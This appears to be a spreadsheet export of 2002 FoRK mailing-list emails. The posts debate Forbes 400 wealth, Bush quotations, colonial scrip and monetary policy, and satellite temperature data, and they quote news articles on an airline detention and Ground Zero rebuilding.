Lovely quote from the Forbes 400 list:
"and not a single Astor, Vanderbilt or Morgan rates a mention on the
current Forbes Four Hundred. "But you have to studiously ignore the 4 Rockefellers, 3 Gettys, 3
Hearsts,  Fords, Kelloggs, Wrigleys,
and so on.There are more self-made people on the list than I previously alluded to
- I made a mistake. Most
of them seem to have Ivy League educations, or are Ivy League dropouts,
suggesting to me that they weren't
exactly poor to start with. Some of them have lovely self-made stories
like:
#347, Johnston, Summerfield K Jr
track this personTrack This Person
 | See all Bacon Makers70 , self made
*Source: Food
,
Coca-Cola* (quote
,
executives
,
news )Net Worth: *$680 mil* returnee
Hometown: Chattanooga , TN*Marital Status:* married , 5 children
Grandfather James and partner landed first Coca-Cola bottling franchise
in 1899. Company passed down 3 generations to Summerfield 1950s. Became
largest independent Coke bottler. Merged with Coca-Cola Enterprises 1991. (...by a compensation committee)
Owen
</t>
  </si>
  <si>
    <t xml:space="preserve">A worthy study procrastination tool: )A few choice phrases from ol dubya himself:"And all our history says we believe in liberty and justice for all,
that when we see oppression, we cry.""If you want to keep the peace, you've got to have the authorization to use force.
-- White House, Sep. 19, 2002""The United States will remain strong in our conviction that we must not, and will not,
 allow the world's worst leaders to hold the United States and our friends and allies blackmail,
 or threaten us with the world's worst weapons."  -- Whats truly sad
 about the "United States and our friends and allies /blackmail/, is
 that he said the same thing in the SAME speech in a paragraph or two
 before.
 "If you find a neighbor in need, you're responsible for serving that neighbor in need,
  you're responsible for loving a neighbor just like you'd like to
  love yourself."
  -- Snerk.   This just begs for potty-mouth comedy.  Too bad the kids
  on southpark just aren't that political.  "I want to send the signal to our enemy that you have aroused a compassionate and decent and mighty nation, and we're going to hunt you down.
-- No, I didn't make this one up. Louisville, Kentucky, Sep. 5, 2002Hee.. Mkay.
http://www.dubyaspeak.com-- 
Best regards,
 bitbitch                          mailto:bitbitch@magnesium.net
</t>
  </si>
  <si>
    <t xml:space="preserve">On Saturday, September 21, 2002, at 10:59 PM, Joseph S. Barrera III 
wrote:&gt; Better yet, tell me where I should be listening for new music now that
&gt; P2P is dead and I still can't pick up KFJC very well.KFJC has a MP3 stream at kfjc.org. I'd also recommend radioparadise.com.I remember the Suburban Lawns, but I don't know what became of them.Apropos of nothing: "Spirited Away" is amazing. Go see it now.-- whump
</t>
  </si>
  <si>
    <t xml:space="preserve">Oh, they were plenty upset about the tea taxes.But the crack down on colonial script certainly screwed over the
American Colonies.  And, BTW, England as well.Dear Ben Franklin was right for the wrong reasons.  First of all the
colonies were not prosperous compared to England proper.  Second, the
issuance of colonial script had nothing to do with full employeement.(In fact, it is almost inconceivable he would make that claim.  It
sounds like a modern Keynsian was creating an urban legend.)OTOH the lack of sufficient circulating monetary instruments was
economically crippling.  Imagine trying to buy your supplies by offering
IOUs on your own name -- and then trying to market / exchange the paper
as the merchant who took the IOU.===========================The most common problem in the world is when a government prints too
much money.  The effects are a complete disaster.  There are a lot of
incentives that push governments into doing this even though it is
incredibly stupid.So almost all the literature talks about that.But you can ALSO screw an economy over by taking all the money out of
circulation.  The fundamental cause of the American Great Depression was
exactly this, courtesy of the Federal Reserve Board.I don't think shifting the power to print money to the bank of Canada
had much effect.  And Canada is still a prosperous country.
&gt; -----Original Message-----
&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
Gary
&gt; Lawrence Murphy
&gt; Sent: Saturday, September 21, 2002 7:31 AM
&gt; To: Mr. FoRK
&gt; Cc: fork@spamassassin.taint.org
&gt; Subject: Re: sed /s/United States/Roman Empire/g
&gt; 
&gt; &gt;&gt;&gt;&gt;&gt; "f" == fork list  writes:
&gt; 
&gt;     f&gt; "Free trade and free markets have proven their ability to lift
&gt;     f&gt; whole societies out of poverty" I'm not a
&gt;     f&gt; socio-political/history buff - does anybody have some clear
&gt;     f&gt; examples?
&gt; 
&gt; China?  Ooops, no wait, scratch that.
&gt; 
&gt; There is one counter example that I can think of, but it may not be
&gt; precisely "free trade/markets" -- when Ben Franklin first visited
&gt; England he was asked why the colonies were so prosperous.  Ben
&gt; explained that they used "Colonial Script", a kind of barter-dollar,
&gt; and increasing the supply of script ensured complete employment.  The
&gt; British bankers were furious and immediately lobbied parliament to
&gt; clamp down on the practice.  Within a few years, the colonies were
&gt; rife with unemployment and poverty just like the rest of the Empire.
&gt; 
&gt; According to questionable literature handed out by a fringe political
&gt; party here in Canada, the Founding Fathers had no real complaint about
&gt; tea taxes, it was the banning of colonial script they were
&gt; protesting. If this is true, then it comes right back to the forces
&gt; that killed Ned Ludd's followers as to why popular opinion believes
&gt; they were protesting a tea tax.  The same pamphlet claimed that Canada
&gt; was also a prosperous nation until, by an act of parliament in the
&gt; late-50's or early 60's, the right to print money was removed from the
&gt; juristiction of parliament and handed over to the Bank of Canada.
&gt; 
&gt; I've wondered about all this.  Certainly the timeline of the collapse
&gt; of the Canadian economy fits the profile, but there are oodles of
&gt; other causes (for example, spending money like we had 300M people when
&gt; we only had 20M) Anyone have any further information on this?
&gt; 
&gt; --
&gt; Gary Lawrence Murphy - garym@teledyn.com - TeleDynamics Communications
&gt;  - blog: http://www.auracom.com/~teledyn - biz: http://teledyn.com/ -
&gt;   "Computers are useless. They can only give you answers." (Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">
&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
Mr.
&gt; FoRK&gt; Also, the lifestyle of the remnants of those
&gt; societies is on average only marginally above poverty even today.As I understand it, there is a huge difference between native Americans
who speak english at home and those who do not.  I don't have figures
that separate those at hand, though.1989 American Indians (US Pop as a whole) -- Families below poverty
27.2% (10%), Persons below poverty 31.2 (13.1), Speak a language other
than English 23 (13.8) Married couple families 65.8 (79.5) Median family
income $21,619 ($35,225) Per Capita $8,284 ($14,420).Note: High Income countries in 1989 were defined as having over $6,000
per capita.  American Indians separated from the rest of the US society
would still be considered a high-income society.</t>
  </si>
  <si>
    <t>Clearly, it is US/NATO = Sun/IBM/OSS, USSR = MS"Where we want you to go in our 5 year plan?"sdwTom wrote:&gt;Im feeling a bit farklempt having spent the night at Todais with the
&gt;family so talk amongst yourself..here Ill give you a topic
&gt;
&gt;The current state of IT can be thought of in terms of the Cold war with
&gt;the US and the UUSR being MS and Sun/IBM/OSS (does it matter which side
&gt;is which?), Apple as Cuba and the US legal system as the UN.
&gt;
&gt;Discuss.
&gt;  
&gt;-- 
sdw@lig.net http://sdw.st
Stephen D. Williams 43392 Wayside Cir,Ashburn,VA 20147-4622
703-724-0118W 703-995-0407Fax Dec2001</t>
  </si>
  <si>
    <t xml:space="preserve">-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1At 11:15 AM -0400 on 9/22/02, Geege Schuman wrote:
&gt; Most of them seem to have Ivy League educations, or are Ivy League
&gt; dropouts suggesting to me that they weren't exactly poor to start
&gt; with.Actually, if I remember correctly from discussion of the list's
composition in Forbes about five or six years ago, the *best* way to
get on the Forbes 400 is to have *no* college at all. Can you say
"Bootstraps", boys and girls? I knew you could...[Given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possible.Why? Because, as of about 1950, the *best* way to get into Harvard,
for instance, is to be *smart*, not rich. Don't take my word for it,
ask their admissions office. Look at the admissions stats over the
years for proof.Meritocracy,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surpassing my own, should just plain know better. The
facts speak for themselves, if you just open your eyes and *look*.
There are no epicycles, the universe does not orbit the earth, and
economics is not a zero-sum game. The cost of anything, including
ignorance and destitution, is the forgone alternative, in this case,
intelligence and effort.[I will, however, admit to being educated *waay* past my level of
competence, and, by the way *you* discuss economics, so have you,
apparently.]BTW, if we ever actually *had* free markets in this country,
*including* the abolition of redistributive income and death taxes,
all those smart people in the Forbes 400 would have *more* money, and
there would be *more* self-made people on that list. In addition,
most of the people who *inherited* money on the list would have
*much* less of it, not even relatively speaking. Finally, practically
all of that "new" money would have come from economic efficiency and
not "stolen" from someone else, investment bubbles or not.That efficiency is called "progress", for those of you in The
People's Republics of Berkeley or Cambridge. It means more and better
stuff, cheaper, over time -- a terrible, petit-bourgeois concept
apparently not worthy of teaching by the educational elite, or you'd
know about it by now. In economic terms, it's also called an increase
in general welfare, and, no, Virginia, I'm not talking about
extorting money from someone who works, and giving it to someone who
doesn't in order to keep them from working and they can think of some
politician as Santa Claus come election time...
In short, then, economics is not a zero sum game, property is not
theft, the rich don't get rich off the backs of the poor, and
redistributionist labor "theory" of value happy horseshit is just
that: horseshit, happy or otherwise.To believe otherwise, is -- quite literally, given the time Marx
wrote Capital and the Manifesto -- romantic nonsense.Cheers,
RAH-----BEGIN PGP SIGNATURE-----
Version: PGP 7.5iQA/AwUBPY511cPxH8jf3ohaEQLAsgCfZhsQMSvUy6GqJ5wgL52DwZKpIhMAnRuR
YYboc+IcylP5TlKL58jpwEfu
=z877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</si>
  <si>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 and say hello to the cool:  Oooo ... /this/ is going to cause
some stir ...http://www.atmos.uah.edu./essl/msu/background.html received via
http://ontario.indymedia.org:8081/front.php3?article_id=12280Using satellites to monitor global climate changeEarth System Science LaboratoryThe University of Alabama in Huntsville
For Additional Information:Dr. John Christy, Associate Professor of Atmospheric ScienceEarth System Science Laboratory, The University of Alabama in HuntsvillePhone: (205) 922-5763 E-mail: christy@atmos.uah.edu
Dr. Roy Spencer, Space ScientistGlobal Hydrology &amp; Climate Center, NASA/Marshall Space Flight CenterPhone: (205) 922-5960 E-mail: roy.spencer@msfc.nasa.gov
SUMMARYAs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Change.GATHERING THE DATAWhile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air.The MSU makes a direct measurement of the temperature by looking at microwaves emitted by oxygen molecules in the atmosphere. The intensity of the microwave emissions - their "brightness" - varies according to temperature.Christy and Spencer developed a method to take the data from several satellites and produce a unified temperature dataset.VERIFYING THE ACCURACY OF MSU MEASUREMENTSA recent comparison (1) of temperature readings from two major climate monitoring systems - microwave sounding units on satellites and thermometers suspended below helium balloons - found a "remarkable" level of agreement between the two.To verify the accuracy of temperature data collected by microwave sounding units, Christy compared temperature readings recorded by "radiosonde" thermometers to temperatures reported by the satellites as they orbited over the balloon launch sites.He found a 97 percent correlation over the 16-year period of the study. The overall composite temperature trends at those sites agreed to within 0.03 degrees Celsius (about 0.054Â° Fahrenheit) per decade. The same results were found when considering only stations in the polar or arctic regions."The idea was to determine the reliability of the satellite data by comparing it to an established independent measurement," Christy said. "If satellite data are reliable when the satellites are over the radiosonde sites, that means you should be able to trust them everywhere else."The 99 radiosondes reported an aggregate warming trend of 0.155 degrees Celsius (about 0.28Â° Fahrenheit) per decade since 1979. Over those 99 spots on the globe, the satellites also recorded a warming trend: 0.128 degrees Celsius (about 0.23Â° Fahrenheit) per decade.Globally, however, the satellite data show a cooling trend of 0.03 degrees Celsius per decade since the first NOAA TIROS-N satellites went into service."These 99 radiosonde launch sites are just not distributed evenly around the planet," Christy said. "They are not representative of the total globe."Radiosonde balloons are released from stations around the world, usually at noon and midnight Greenwich standard time. As each balloon climbs from the surface to the stratosphere, the temperature is measured and relayed to the ground by radio.While there are more than 1,000 radiosonde launch sites globally, the data from many sites either are not readily available or are not consistently collected. Christy used data from 99 sites at which there has been long-term systematic and reliable data collection. These 99 radiosonde launch sites are in a box bounded by Iceland, Trinidad, Truk Island and Alaska.In an earlier study, an upper air temperature record compiled by NOAA from 63 daily weather balloon sites around the world indicated a 17-year climate trend of -0.05Â° C per decade, which was in exact agreement with the satellite data at that time, Christy said.GLOBAL COVERAGEOne advantage of the MSU dataset is its global coverage. Microwave sounding units aboard NOAA satellites directly measure the temperature of the atmosphere over more than 95 percent of the globe. Each satellite measures the temperature above most points on Earth every 12 hours.The 'global temperature' that has been frequently reported from surface measurements is neither global in extent nor systematic in measurement method. It neglects vast oceanic and continental regions, including Antarctica, the Brazilian rain forests, the Sahara Desert and Greenland.The most commonly cited historical temperature dataset is from ground-based thermometers. More than 5,000 thermometers worldwide provide almost instantaneous local temperature data through links to weather services and scientists.Most of these thermometers, which are usually in small shelters about five feet above the ground, are in areas easily accessible to people. In the U.S. and other industrial countries, these thermometers are most often found at airports.The ground-based network is extensive in North America, Europe, Russia, China and Japan. It is less comprehensive in Africa, South America, Australia and across much of Southern Asia.Temperatures on the surface and vertically through the atmosphere are gathered daily by thermometers carried aloft by helium balloons. "Radiosonde" balloons are released from stations around the world, usually at noon and midnight Greenwich standard time.While balloon release sites are scattered throughout the world, they are concentrated in industrial nations. There are more than 1,000 radiosonde launch sites globally. If they were evenly distributed around the world, that would equal approximately one for every 195,000 square miles of the Earth's surface.Water temperatures, which are used to derive estimates of atmospheric temperatures, come from thermometers on piers and buoys, and aboard "ships of opportunity." The ships record the temperature of water drawn in to cool their engines. The water temperature data from these instruments is also not global in its coverage, tending instead to be concentrated in heavily-travelled shipping lanes, and in harbors.In the past 12 years, a new system of approximately 100 deep ocean buoys has been established, gathering both atmospheric and water temperature data.INSTRUMENT ACCURACY; MSUWith nine satellites measuring the temperature over periods of from one to six years, a method was devised to merge all the data into a single, consistent time series.Each satellite has its own bias that, if not calculated and removed, would introduce spurious trends. The biases are calculated by directly comparing each satellite with others in operation at that time. Periods of overlapping operation ranged from three months to three years, and were sufficient to determine these biases.Because the MSU instruments are so stable and have so many thousands of observations, the biases between the satellites are known to within 0.01 deg. The final product removes these biases so that all data are referenced to a common base. (2)To check the final product, comparisons were made over a 16-year period with balloon measurements as stated above, and the phenomenal agreement provided the independent validation necessary to conclude that the merging technique developed for this dataset was accurate.INSTRUMENT ACCURACY; GROUND-BASED THERMOMETERSOf great concern to scientists is the lack of consistency in the way readings are taken and in the thermometer surroundings. Since most thermometers for which long-term records exist are in towns and cities, the effects of population growth and the construction of nearby roads, parking lots, runways and buildings may cause the temperature to rise a little due of urbanization. This temperature change may be an artifact of a local "asphalt effect" rather than a long-term widespread climate change.INSTRUMENT ACCURACY; SHIPS OF OPPORTUNITYWhile the temperature data collected by ships at sea is reported as a sea surface temperature, this data reflects water temperatures from about three to 60 feet below the surface - the level from which water is drawn into the ships.The thousands of individual thermometers used to collect this data are not calibrated against a scientific standard, nor is there a method for verifying the accuracy of either the thermometers or the reports matching temperature readings to specific times and places.Only in places where there are many overlapping observations can there be any confidence in their accuracy.THE SCIENTISTSIn 1996, Spencer and Christy received the American Meteorological Society's Special Award. They were honored "for developing a global, precise record of the Earth's temperature from operational polar-orbiting satellites, fundamentally advancing our ability to monitor climate."AMS Special Awards are given to individuals or organizations not appropriately recognized by more specifically-defined awards, and who have made important contributions to the science or practice of meteorology or to the society.In 1991, Spencer and Christy received NASA's Exceptional Scientific Achievement Medal.DR. JOHN CHRISTYChristy began his scientific career as a senior research associate at UAH in 1987, after earning his B.A. (1973) in mathematics from California State University-Fresno, his M.Div. (1978) from Golden Gate Baptist Theological Seminary, and his M.S. (1984) and Ph.D. (1987) degrees in atmospheric sciences from the University of Illinois.He was an instructor of mathematics at Parkland College in Champaign, IL, 1983-87, an instructor of mathematics at the University of South Dakota, 1981-82, and an instructor of mathematical sciences at Yankton (S.D.) College, 1980-81.He also served as pastor of the Grace Baptist Church in Vermillion, S.D., 1978-82, and as science master at Baptist High School, Nyeri, Kenya, 1973-75. He has published more than 20 refereed scientific papers.Christy serves on the NOAA National Scientific Review Panel for the National Climatic Data Center, and on NOAA's Pathfinder Review Panel. He was an "invited key contributor" to the 1995 Intergovernmental Panel on Climate Change's scientific assessment of climate change, and served as a contributor to the 1992 and 1994 IPCC reports.DR. ROY SPENCERSpencer began his career as a research associate at the Space Science and Engineering Center in Madison, WI, in 1981, after earning his B.S. (1978) in meteorology at the University of Michigan and his M.S. (1979) and Ph.D. (1981) degrees in meteorology from the University of Wisconsin-Madison. He was a Universities Space Research Association visiting scientist at MSFC, 1984-87, before joining the MSFC staff in 1987.He is the U.S. team leader for the Multichannel Microwave Imaging Radiometer Team and has served on numerous committees relating to remote sensing. He directs a program involving satellite and aircraft passive microwave data to build global climate data sets and to address climate research issues. Spencer is lead author on sixteen scientific papers.BIBLIOGRAPHY(1) J.R. Christy, 1995, "Climatic Change," Vol. 31, pp. 455-474.(2) J.R. Christy, R.W. Spencer and R.T. McNider, 1995, "Journal of Climate,"Vol. 8, pp. 888-896.R.W. Spencer, J.R. Christy and N.C. Grody, 1990, "Journal of Climate," Vol. 3,pp. 111-1128.R.W. Spencer and J.R. Christy, 1992, "Journal of Climate," Vol. 5, pp. 858-SEE ALSO
http://science.nasa.gov/newhome/headlines/essd5feb97_1.htm
http://science.nasa.gov/newhome/headlines/notebook/essd13aug98_1.htm
http://www.ghcc.msfc.nasa.gov/MSU/hl_measuretemp.htm
http://www.atmos.uah.edu/atmos/christy.html
-- 
Gary Lawrence Murphy - garym@teledyn.com - TeleDynamics Communications
 - blog: http://www.auracom.com/~teledyn - biz: http://teledyn.com/ -
  "Computers are useless. They can only give you answers." (Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">Gary Lawrence Murphy wrote:
&gt;and say hello to the cool:  Oooo ... /this/ is going to cause some stir ...Of course not.  Some people just don't want to be confused by the facts.
&gt;SUMMARY
&gt;
&gt;As part of an ongoing NASA/UAH joint project, Dr. John Christy of UAH
&gt;and Dr. Roy Spencer of NASA's Marshall Space Flight Center use data
&gt;gathered by microwave sounding units (MSUs) on National Oceanic and
&gt;Atmospheric Administration TIROS-N satellites to get accurate, direct
&gt;measurements of atmospheric temperatures for almost all regions of the
&gt;Earth [...]But some plonker will come up with yet another computer model
predicting global warming and storms and floods in 50 years even
though it can't predict next week's weather.  And predict widespread
cooling in some parts of the globe (which is now part of global
"warming").  And will get plenty of publicity for even more conclusive
scaremong^H^H^H^H^H^H^H^H^H proof.
&gt;[...]
&gt;Globally, however, the satellite data show a cooling trend of 0.03
&gt;degrees Celsius per decade since the first NOAA TIROS-N satellites
&gt;went into service.Umpteen studies have already shown that temperature variations, when
even detectable in the noise, go either way depending on which data
you look at.
&gt;Of great concern to scientists is the lack of consistency in the way
&gt;readings are taken [...] the construction of
&gt;nearby roads, parking lots, runways and buildings may cause the
&gt;temperature to rise a little due of urbanization. This temperature
&gt;change may be an artifact of a local "asphalt effect" rather than a
&gt;long-term widespread climate change.One study from Vienna showed long-term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 Friedrich Nietzsche.
"Bullshit!"
- Rob.     .-.                                                               .-.
    /   \           .-.                                 .-.           /   \
   /     \         /   \       .-.     _     .-.       /   \         /     \
  /       \       /     \     /   \   / \   /   \     /     \       /       \
 /         \     /       \   /     `-'   `-'     \   /       \     /         \
            \   /         `-'                     `-'         \   /
             `-'                                               `-'
</t>
  </si>
  <si>
    <t xml:space="preserve">
In a message dated 9/22/2002 11:38:01 PM, rah@shipwright.com writes:&gt;the *best* way to
&gt;get on the Forbes 400 ishistorically: real estateTom
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.nytimes.com/2002/09/23/opinion/23HERB.html?todaysheadlines=&amp;pagewanted=print&amp;position=top The New York Times
September 23, 2002
High-Altitude Rambos
By BOB HERBERTDr. Bob Rajcoomar, a U.S. citizen and former military physician from Lake
Worth, Fla., found himself handcuffed and taken into custody last month in
one of the many episodes of hysteria to erupt on board airliners in the
U.S. since the Sept. 11 attacks.Dr. Rajcoomar was seated in first class on a Delta Airlines flight from
Atlanta to Philadelphia on Aug. 31 when a passenger in the coach section
began behaving erratically. The passenger, Steven Feuer, had nothing to do
with Dr. Rajcoomar.Two U.S.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Hollywood's latest action extravaganza.They handcuffed Mr. Feuer, hustled him into first class and restrained him
in a seat next to Dr. Rajcoomar. The 180 or so passengers were now quite
jittery. Dr. Rajcoomar asked to have his seat changed and a flight
attendant obliged, finding him another seat in first class. The incident,
already scary, could - and should - have ended there. But the marshals were
not ready to let things quiet down.One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shot.The passengers were petrified, with most believing that there were
terrorists on the plane."I was afraid there was going to be a gun battle in that pressurized
cabin," said Senior Judge James A. Lineberger of the Philadelphia Court of
Common Pleas, a veteran of 20 years in the military, who was sitting in an
aisle seat in coach. "I was afraid that I was going to die from the gunfire
in a shootout."Dr. Rajcoomar's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cell.This was airline security gone berserk. No one ever suggested that Dr.
Rajcoomar, a straight-arrow retired Army major, had done anything wrong.Dr. Rajcoomar, who is of Indian descent, said he believes he was taken into
custody solely because of his brown skin. He was held for three frightening
hours and then released without being charged. Mr. Feuer was also released.Officials tried to conceal the names of the marshals, but they were
eventually identified by a Philadelphia Inquirer reporter as Shawn B.
McCullers and Samuel Mumma of the Transportation Security Administration,
which is part of the U.S. Transportation Department.The Transportation Security Administration has declined to discuss the
incident in detail. A spokesman offered the absurd explanation that Dr.
Rajcoomar was detained because he had watched the unfolding incident "too
closely."If that becomes a criterion for arrest in the U.S., a lot of us reporters
are headed for jail.Dr. Rajcoomar told me yesterday that he remains shaken by the episode. "I
had never been treated like that in my life," he said. "I was afraid that I
was about to be beaten up or killed."Lawyers for the American Civil Liberties Union have taken up his case and
he has filed notice that he may sue the federal government for unlawful
detention."We have to take a look at what we're doing in the name of security," said
Dr. Rajcoomar. "So many men and women have fought and died for freedom in
this great country, and now we are in danger of ruining that in the name of
security."--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</si>
  <si>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http://online.wsj.com/article_print/0,,SB10327475102363433,00.html
The Wall Street JournalSeptember 23, 2002
COMMENTARYRebuild at Ground ZeroBy LARRY SILVERSTEINEarlier this month, we New Yorkers observed the solemn anniversary of the
horrific events that befell our city on Sept. 11, 2001. All of those who
perished must never be forgotten. The footprints of the fallen Twin Towers
and a portion of the 16-acre site must be dedicated to a memorial and civic
amenities that recall the sacrifices that were made there and the anguish
that those senseless acts of terror created for the victims' families and,
indeed, for all of us.But for the good of the city and the region, the 10-million-plus square
feet of commercial and retail space that was destroyed with the Twin Towers
must be replaced on the site.About 50,000 people worked in the World Trade Center. Those jobs are lost,
along with those of another 50,000 people who worked in the vicinity.
Together, those jobs in lower Manhattan, for which the Trade Center was the
economic stimulus, produced annual gross wages of about $47 billion, or 15%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rebuilding.If we do not replace the lost space, lower Manhattan never will regain the
vibrancy it had as the world's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statement.In recent weeks, redevelopment proposals have been circulated from many
sources. Most of these focus not on the Trade Center site, however, but on
all of lower Manhattan. Further, many believe that the 10 million square
feet either could be located elsewhere, scattered in several sites, or
simply never rebuilt.These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was.Access to mass transit makes the site ideal for office space of this size.
That was a major reason why the Twin Towers were leased to 97% occupancy
before 9/11. None of the other sites proposed for office development has
remotely equal transportation access. With the reconstruction of the subway
and PATH stations, plus an additional $4.5 billion in transit improvements
planned, such as the new Fulton Transit Center and the direct
"Train-to-the-Plane" Long Island Rail Road connection, the site becomes
even more the logical locus of office development.And New York will need the space. Before 9/11, the Group of 35, a task
force of civic leaders led by Sen. Charles Schumer and former Treasury
Secretary Robert Rubin, concluded that the city would need an additional 60
million square feet of new office space by 2020 to accommodate the
anticipated addition of 300,000 new jobs. The loss of the Twin Towers only
heightens the need.As for those who say that 10 million square feet of office space downtown
cannot be absorbed by the real estate market, I would simply point out that
history shows them wrong. New York now has about 400 million square feet of
office space. All new construction underway already is substantially leased
up. New York had 48 million square feet of vacant office space at the
beginning of the recession in 1990. By 1998, this space had been absorbed,
at an annual rate of about 6 million square feet.We are seeking to rebuild 10 million square feet on the Trade Center site
over a period of about 10 years, with the first buildings not coming on
line until 2008 and the project reaching completion in 2012. This is an
annual absorption rate of about a million feet, much lower than the 1990s'
rate.Those who argue that New York cannot reabsorb office space that it
previously had are saying that the city has had its day and is entering an
extended period of stagnation and decline. I will not accept this view, nor
will most New Yorkers.Mayor Michael Bloomberg said in a recent interview with the New York Times
that the city "has to do two things: memorialize, but also build for the
future." I believe that the Twin Towers site can gracefully accommodate --
and that downtown requires -- office and retail space of architectural
significance, a dignified memorial that both witnesses and recalls what
happened, and cultural amenities that would benefit workers as well as
residents of the area.The challenge to accomplish this is enormous. But our city is up to the task.Mr. Silverstein is president of Silverstein Properties, a real estate firm
whose affiliates hold 99-year leases on the World Trade Center site.--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</si>
  <si>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[Destined to be a new reality TV Show?]
Anarchist 'Scavenger Hunt' Raises D.C. Police Ire
Sat Sep 21, 3:37 PM ETWASHINGTON (Reuters) - An online "anarchist scavenger
hunt" proposed for next week's annual meeting of the
International Monetary Fund ( news - web sites) and
World Bank ( news - web sites) here has raised the ire
of police, who fear demonstrators could damage
property and wreak havoc.Break a McDonald's window, get 300 points. Puncture a
Washington D.C. police car tire to win 75 points.
Score 400 points for a pie in the face of a corporate
executive or World Bank delegate.D.C. Assistant Police Chief Terrance Gainer told a
congressional hearing on Friday that law authorities
were in talks to decide whether planned protests were,
"so deleterious to security efforts that we ought to
take proactive action."Several thousand people are expected to demonstrate
outside the IMF and World Bank headquarters next
weekend.The Anti-Capitalist Convergence, a D.C.-based
anarchist group, is also planning a day-long traffic
blockade, banner-drops and protests against major
corporations in the downtown core.Chuck, the 37 year-old webmaster of the anarchist site
www.infoshop.org who declined to give his last name,
told Reuters his scavenger hunt was meant as a joke."People were asking for things to do when they come to
D.C. We made the list to get people thinking, so they
don't do the boring, standard stuff," he said. "I
doubt people will actually keep track of what they do
for points."</t>
  </si>
  <si>
    <t xml:space="preserve">R. A. Hettinga wrote:&gt;-----BEGIN PGP SIGNED MESSAGE-----
&gt;Hash: SHA1
&gt;
&gt;At 11:15 AM -0400 on 9/22/02, Geege Schuman wrote:
&gt;
&gt;
&gt;  
&gt;
&gt;&gt;Most of them seem to have Ivy League educations, or are Ivy League
&gt;&gt;dropouts suggesting to me that they weren't exactly poor to start
&gt;&gt;with.
&gt;&gt;    
&gt;&gt;
&gt;
&gt;Actually, if I remember correctly from discussion of the list's
&gt;composition in Forbes about five or six years ago, the *best* way to
&gt;get on the Forbes 400 is to have *no* college at all. Can you say
&gt;"Bootstraps", boys and girls? I knew you could...
&gt;  
&gt;
Sure - discussion in Forbes - rigorous research, that. Especially when 
the data in their own list
contradicts them. I continue to look at the list and all the "inherited, 
growed" entries. I guess if
I read it enough times my vision will clear.&gt;[Given that an undergraduate liberal arts degree from a state school,
&gt;like, say, mine, :-), is nothing but stuff they should have taught
&gt;you in a government-run "high" school, you'll probably get more of
&gt;*those* on the Forbes 400 as well as time goes on. If we ever get
&gt;around to having a good old fashioned government-collapsing
&gt;transfer-payment depression (an economic version of this summer's
&gt;government-forest conflagration, caused by the same kind of
&gt;innumeracy that not clear-cutting enough forests did out west this
&gt;summer :-)) that should motivate more than a few erst-slackers out
&gt;there, including me, :-), to learn to actually feed themselves.]
&gt;
&gt;
&gt;The *next* category on the Forbes 400 list is someone with a
&gt;"terminal" professional degree, like an MBA, PhD, MD, etc., from the
&gt;best school possible.
&gt;
&gt;Why? Because, as of about 1950, the *best* way to get into Harvard,
&gt;for instance, is to be *smart*, not rich. Don't take my word for it,
&gt;ask their admissions office. Look at the admissions stats over the
&gt;years for proof.
&gt;  
&gt;
I, at on point, looked into Stanford Business School. After learning 
that tuition was &gt; 20K,
no financial aid was available, and part-time work was disallowed, this 
smart person decided
that I was not willing to spend the $150 application fee 
(non-refundable). During attendance at
my local business school, I was told repeatedly I should have gone for 
it - to quote a prof, (Northwestern MBA), it
has nothing to do with the education you receive - in general European 
(and Canadian) business
schools are better and more innovative - its the connections. He used 
the words "American nobility."&gt;Meritocracy, American Style, was *invented* at the Ivy League after
&gt;World War II. Even Stanford got the hint, :-), and, of course,
&gt;Chicago taught them all how, right? :-). Practically *nobody* who
&gt;goes to a top-20 American institution of higher learning can actually
&gt;afford to go there these days. Unless, of course, their parents, who
&gt;couldn't afford to go there themselves, got terminal degrees in the
&gt;last 40 years or so. And their kids *still* had to get the grades,
&gt;and "biased" (by intelligence :-)), test scores, to get in.
&gt;  
&gt;
"invented" being the right word. Dubya went to Yale and HBS. I guess 
"practically" gets you
around that problem.&gt;
&gt;The bizarre irony is that almost all of those people with "terminal"
&gt;degrees, until they actually *own* something and *hire* people, or
&gt;learn to *make* something for a living all day on a profit and loss
&gt;basis, persist in the practically insane belief, like life after
&gt;death, that economics is some kind of zero sum game, that dumb people
&gt;who don't work hard for it make all the money, and, if someone *is*
&gt;smart, works hard, and is rich, then they stole their wealth somehow.
&gt;
&gt;BTW, none of you guys out there holding the short end of this
&gt;rhetorical stick can blame *me* for the fact that I'm using it to
&gt;beat you severely all over your collective head and shoulders. You
&gt;were, apparently, too dumb to grab the right end. *I* went to
&gt;Missouri, and *I* don't have a degree in anything actually useful,
&gt;much less a "terminal" one, which means *I*'m broker than anyone on
&gt;this list -- it's just that *you*, of all people, lots with
&gt;educations far surpassing my own, should just plain know better. The
&gt;facts speak for themselves, if you just open your eyes and *look*.
&gt;There are no epicycles, the universe does not orbit the earth, and
&gt;economics is not a zero-sum game. The cost of anything, including
&gt;ignorance and destitution, is the forgone alternative, in this case,
&gt;intelligence and effort.
&gt;
&gt;[I will, however, admit to being educated *waay* past my level of
&gt;competence, and, by the way *you* discuss economics, so have you,
&gt;apparently.]
&gt;
&gt;  
&gt;
Its interesting but in this part of the World (Nova Scotia) a recent 
study found that college graduates
earn less than graduates of 2 year community colleges (trade schools). 
They did decline to mention
that the demand for some trades  is so great that some of
them are demanding university degrees to get in. Just for the record - 
the average salary for
a university graduate (including advanced degree holders) here is C$ 
21,000  -- &lt; $14,000 US. No wonder
half of San Francisco has set up here - we have a whole whack of call 
centers that
have arrived here in the last couple of years - I think they hire some 
entry level IT people for around $10 ($6 US) an
hour, which of course, fits perfectly for me - my entry level job, in 
1986, paid $11.00 an hour. The fundamental difference
is that most of the jobs that require a trade are *unionized*.In other 
words, in this part of the world, for the vast majority of people, 
 union dues are a better investment than tuition. The counter-argument 
to this is that many college graduates
 leave for better work elsewhere, but the counter-counter argument is 
that we are the thin edge
(one of several really - prison labor in the US would be another) of 
third-world wages and work practices coming
 to North America.I worked at a company that had a 14-year wage freeze. The fact that they 
could maintain that (and prosper) just says
 volumes about the economy in this part of the world. I met many people 
there, like me, who felt that was fine, I can vote
with my feet. They didn't quite realize that just about every large 
employer in the area has similar, or worse, policies. Anyway
eventually they started a union drive. During the vote, retired 
employees were brought in by the employer (rumours were
that they were paid the going rate for a vote around here - a bottle of 
